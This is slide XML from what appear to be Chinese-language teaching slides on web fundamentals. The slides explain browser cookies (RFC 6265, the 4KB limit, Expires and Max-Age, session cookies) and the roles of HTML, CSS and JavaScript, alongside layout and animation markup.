          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8947785" y="3912235"/>
            <a:ext cx="1983740" cy="1971040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 12"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7218680" y="1606550"/>
            <a:ext cx="2265680" cy="1822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9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="495935" y="1282065"/>
            <a:ext cx="10292715" cy="436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汉仪雅酷黑 85W" panose="020B0904020202020204" charset="-122"/>
              <a:ea typeface="汉仪正圆-55W" panose="00020600040101010101" charset="-122"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="495935" y="1282065"/>
            <a:ext cx="9502775" cy="4223385"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>什么是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Cookie 是直接存储在浏览器中的一小串数据，它们是 HTTP 协议的一部分，用于</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>客户端</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>与服务器之间传递数据，Cookie 大小限制为 4KB ，由 RFC 6265 规范定义，但是</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>不能存储重要信息</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，Cookie 有生命周期，仅在浏览器打开期间有效，一旦浏览器关闭，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ookie 就会被删除，可以通过 Expires</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>设置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ookie 的过期时间，格式为 GMT（格林威治标准时间）。到达这个时间后，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ookie 将失效。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>也可以通过Max-Age指定 cookie 的有效期（以秒为单位）。从创建时起，经过这个时间后，cookie 将失效</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。如果不设置 Expires 或 Max-Age，则创建的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ookie 将是会话</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ookie，浏览器关闭后会被自动删除。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6101715" y="5092700"/>
            <a:ext cx="3896995" cy="1278890"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342265" y="6012180"/>
            <a:ext cx="8161655" cy="617220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>RFC 6265</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>协议官方</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>介绍：https://www.rfc-editor.org/rfc/rfc6265.html</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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>技术</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="标题 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="710880" y="1002232"/>
            <a:ext cx="10698800" cy="51719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2800" b="1" u="none" strike="noStrike" kern="1200" cap="none" spc="300" normalizeH="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="850499" y="1646461"/>
            <a:ext cx="10491002" cy="946486"/>
            <a:chOff x="849368" y="1619193"/>
            <a:chExt cx="10491002" cy="946486"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="8" name="组合 7"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="849368" y="1619193"/>
              <a:ext cx="10491002" cy="946486"/>
              <a:chOff x="920210" y="1823315"/>
              <a:chExt cx="10491002" cy="946486"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="矩形: 对角圆角 42"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="920210" y="1823316"/>
                <a:ext cx="10491002" cy="946485"/>
              </a:xfrm>
              <a:prstGeom prst="round2DiagRect">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 5917"/>
                  <a:gd name="adj2" fmla="val 5241"/>
                </a:avLst>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="6350">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lvl="1">
                  <a:lnSpc>
                    <a:spcPts val="2600"/>
                  </a:lnSpc>
                </a:pPr>
                <a:endPar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93700" lvl="1" indent="-285750">
                  <a:lnSpc>
                    <a:spcPts val="2600"/>
                  </a:lnSpc>
                  <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                  <a:buChar char="l"/>
                </a:pP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浏览器呈现的页面，加载的最重要的资源是</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HTML</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CSS</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JavaScript</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US"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，并由三者组成。</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="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矩形: 对角圆角 43"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="920211" y="1823315"/>
                <a:ext cx="1230443" cy="431493"/>
              </a:xfrm>
              <a:prstGeom prst="round2DiagRect">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 17163"/>
                  <a:gd name="adj2" fmla="val 0"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:ln w="6350">
                <a:noFill/>
                <a:prstDash val="lgDash"/>
              </a:ln>
            </p:spPr>
            <p:style>
              <a:lnRef idx="2">
                <a:schemeClr val="accent1">
                  <a:shade val="50000"/>
                </a:schemeClr>
              </a:lnRef>
              <a:fillRef idx="1">
                <a:schemeClr val="accent1"/>
              </a:fillRef>
              <a:effectRef idx="0">
                <a:schemeClr val="accent1"/>
              </a:effectRef>
              <a:fontRef idx="minor">
                <a:schemeClr val="lt1"/>
              </a:fontRef>
            </p:style>
            <p:txBody>
              <a:bodyPr lIns="108000" tIns="0" rIns="36000" bIns="72000" rtlCol="0" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr defTabSz="360045">
                  <a:lnSpc>
                    <a:spcPct val="150000"/>
                  </a:lnSpc>
                </a:pP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页面</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="16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0" name="Shape 2539"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1017649" y="1692447"/>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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="组合 13"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1656184" y="3134239"/>
            <a:ext cx="1737228" cy="1722634"/>
            <a:chOff x="2366233" y="3426339"/>
            <a:chExt cx="1737228" cy="1722634"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="圆角矩形 63"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="2700000">
              <a:off x="2373530" y="3419042"/>
              <a:ext cx="1722634" cy="1737228"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="0">
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="84000">
                  <a:srgbClr val="67FECF"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="3000000" scaled="0"/>
            </a:gradFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="63500">
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                  <a:alpha val="40000"/>
                </a:schemeClr>
              </a:glow>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FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="inpin heiti" panose="00000500000000000000" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="文本框 15"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2718658" y="4056894"/>
              <a:ext cx="1365885" cy="460375"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr fontAlgn="auto">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2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HTML</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" alt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文本框 17"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2937969" y="4518485"/>
              <a:ext cx="591671" cy="307777"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr fontAlgn="auto">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <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结构</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US"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9" name="组合 18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4775902" y="3134238"/>
            <a:ext cx="1737228" cy="1722634"/>
            <a:chOff x="5485951" y="3426338"/>
            <a:chExt cx="1737228" cy="1722634"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="圆角矩形 63"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="2700000">
              <a:off x="5493248" y="3419041"/>
              <a:ext cx="1722634" cy="1737228"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="0">
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="84000">
                  <a:srgbClr val="67FECF"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="3000000" scaled="0"/>
            </a:gradFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="63500">
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                  <a:alpha val="40000"/>
                </a:schemeClr>
              </a:glow>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FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="inpin heiti" panose="00000500000000000000" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="文本框 20"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5983791" y="4056893"/>
              <a:ext cx="1230630" cy="460375"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr fontAlgn="auto">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="24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CSS</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US"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2" name="文本框 21"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6060756" y="4518484"/>
              <a:ext cx="591671" cy="307777"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr fontAlgn="auto">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <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表现</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US"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23" name="组合 22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7895620" y="3134237"/>
            <a:ext cx="1821032" cy="1907664"/>
            <a:chOff x="8605669" y="3426337"/>
            <a:chExt cx="1737228" cy="1722634"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="圆角矩形 63"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="2700000">
              <a:off x="8612966" y="3419040"/>
              <a:ext cx="1722634" cy="1737228"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="0">
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="84000">
                  <a:srgbClr val="67FECF"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="3000000" scaled="0"/>
            </a:gradFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="63500">
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                  <a:alpha val="40000"/>
                </a:schemeClr>
              </a:glow>
              <a:outerShdw blurRad="203200" dist="38100" dir="5400000" sx="101000" sy="101000" algn="t" rotWithShape="0">
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40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FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="inpin heiti" panose="00000500000000000000" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="文本框 24"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8626157" y="4056820"/>
              <a:ext cx="1694283" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr fontAlgn="auto">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">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JavaScript</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"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文本框 25"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9179490" y="4518483"/>
              <a:ext cx="591671" cy="307777"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr fontAlgn="auto">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="140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行为</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US"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3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7487842" y="5243615"/>
            <a:ext cx="3370658" cy="510524"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F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为网页添加各种格式的动态功能</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F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文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4112026" y="5243615"/>
            <a:ext cx="3370658" cy="510524"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F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为用户提供更美观的浏览效果</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F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文本框 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1018780" y="5238006"/>
            <a:ext cx="3370658" cy="510524"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F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为用户展示页面数据内容</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F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灯片编号占位符 1"/>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par>
                                <p:cTn id="9" presetID="12" presetClass="entr" presetSubtype="1"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ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-#ppt_h*1.125000"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="19"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="13" presetID="12" presetClass="entr" presetSubtype="1"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p:tgtEl>
                                          <p:spTgt spid="23"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-#ppt_h*1.125000"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="wipe(down)">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mph" presetSubtype="0" repeatCount="2000" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="14"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="14"/>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2000" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="19"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="19"/>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repeatCount="2000" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
